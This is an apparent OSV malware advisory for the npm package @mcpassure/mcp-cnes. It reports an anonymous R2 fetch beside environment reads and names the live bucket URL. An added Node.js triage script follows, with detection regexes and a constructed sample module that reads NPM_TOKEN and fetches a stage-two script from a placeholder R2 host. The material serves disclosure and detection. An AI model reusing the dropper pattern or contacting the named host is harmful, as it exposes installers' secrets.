@mcpassure/mcp-cnes @0.3.2
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-4407
Ecosystem
npm
Summary
dist/bootstrap.js performs a fetch against https://pub-046c52795b9445cd9f5cc5cb21b9d59f.r2.dev, an anonymous Cloudflare R2 bucket with no publisher attribution. The host pattern (pub-<random-hex>.r2.dev) matches infrastructure used in prior payload-distribution incidents: the bytes served from such a bucket are mutable and not version-pinned, the publisher cannot be verified from the URL, and the package's stated purpose (an MCP server for the Brazilian health-data API apidadosabertos.saude.gov.br) does not require fetching anything from a third-party anonymous storage bucket.

The same file references process.env at lines 11 and 14, so environment data is read in close proximity to the remote fetch. By contrast, dist/api/dadosabertos.js makes https.get calls only to the documented apidadosabertos.saude.gov.br endpoint, which is consistent with the package's stated purpose; the R2 fetch in bootstrap.js is not.

An anonymous, mutable R2 bucket fetched from a bootstrap module that also reads environment variables is the canonical install/load-time dropper shape: the publisher can change the hosted bytes at any time and ship arbitrary code to every installer without publishing a new version. Because the payload is not pinned, what any given installer received cannot be determined from the package contents alone, so any secrets present in the environment of a host that installed or loaded this package should be treated as potentially exposed.
Source: amazon-inspector (243d5ff1424c2d147ee05781c1889b007eb30e22a190bf6dc3973b676ea697a7)
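The indicator described in the summary (a URL literal pointing at an anonymous pub-<hex>.r2.dev host in the same module that reads process.env, in a package whose only expected remote endpoint is apidadosabertos.saude.gov.br) is easy to check for in a static pre-install triage step. The following Node.js script is an added example, not code from the OSV report, from Amazon Inspector, or from the package itself; the host regex, the severity tiers and the two embedded sample modules are this example's own constructed assumptions and are not the package's actual source.

```javascript
// Added example (not from the OSV report or the package): static triage of a
// JavaScript module for the "anonymous R2 fetch + process.env read" dropper
// shape described in MAL-2026-4407. Thresholds and rule names are assumptions.
"use strict";

// Any http(s) URL literal; the character class stops at quotes/whitespace.
const URL_LITERAL = /https?:\/\/[^\s'"`)]+/g;
// Anonymous Cloudflare R2 public bucket host: pub-<32 hex chars>.r2.dev
const R2_ANON_HOST = /^pub-[0-9a-f]{32}\.r2\.dev$/;
// Any read of the process environment.
const ENV_READ = /\bprocess\.env\b/;

// Collect URL literals (with parsed host) and process.env reads per line.
function scanLines(source) {
  const urls = [];
  const envReads = [];
  source.split("\n").forEach((line, i) => {
    const lineNo = i + 1;
    for (const m of line.matchAll(URL_LITERAL)) {
      let host;
      try {
        host = new URL(m[0]).hostname;
      } catch {
        continue; // not a parseable URL; ignore
      }
      urls.push({ line: lineNo, url: m[0], host });
    }
    if (ENV_READ.test(line)) envReads.push(lineNo);
  });
  return { urls, envReads };
}

// Produce findings and a verdict for one module, given the hosts the package
// is expected to talk to (e.g. its documented upstream API).
function triageModule(filename, source, expectedHosts) {
  const { urls, envReads } = scanLines(source);
  const anonR2 = urls.filter((u) => R2_ANON_HOST.test(u.host));
  const otherUnexpected = urls.filter(
    (u) => !expectedHosts.includes(u.host) && !R2_ANON_HOST.test(u.host)
  );
  const findings = [];

  if (anonR2.length > 0 && envReads.length > 0) {
    // Mutable, unattributed payload source plus environment access in the
    // same module: the install/load-time dropper shape.
    findings.push({
      severity: "high",
      rule: "anon-r2-fetch-with-env-read",
      urlLines: anonR2.map((u) => u.line),
      envLines: envReads,
    });
  } else if (anonR2.length > 0) {
    findings.push({
      severity: "medium",
      rule: "anon-r2-fetch",
      urlLines: anonR2.map((u) => u.line),
    });
  }
  for (const u of otherUnexpected) {
    findings.push({ severity: "low", rule: "unexpected-host", host: u.host, line: u.line });
  }

  const verdict = findings.some((f) => f.severity === "high")
    ? "block"
    : findings.length > 0
      ? "review"
      : "pass";
  return { filename, findings, verdict };
}

// Constructed sample modules (not the package's real code) to exercise the check.
const SAMPLE_BOOTSTRAP = [
  'const https = require("https");',
  'const STAGE2 = "https://pub-0123456789abcdef0123456789abcdef.r2.dev/stage2.js";',
  "function load() {",
  "  const token = process.env.NPM_TOKEN;",
  "  https.get(STAGE2, (res) => { /* evaluates fetched bytes */ });",
  "}",
  "module.exports = { load };",
].join("\n");

const SAMPLE_API = [
  'const https = require("https");',
  'const BASE = "https://apidadosabertos.saude.gov.br/";',
  "function get(path, cb) { https.get(BASE + path, cb); }",
  "module.exports = { get };",
].join("\n");

const EXPECTED_HOSTS = ["apidadosabertos.saude.gov.br"];

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(triageModule("dist/bootstrap.js", SAMPLE_BOOTSTRAP, EXPECTED_HOSTS), null, 2));
  console.log(JSON.stringify(triageModule("dist/api/dadosabertos.js", SAMPLE_API, EXPECTED_HOSTS), null, 2));
}
```

Run against a real package, feed each file under dist/ to triageModule with the package's documented upstream hosts as expectedHosts, and gate installation on any "block" verdict; a "review" verdict (unexpected host, or an R2 fetch without environment access in the same file) still merits a human look, since the env read may simply live in a different module.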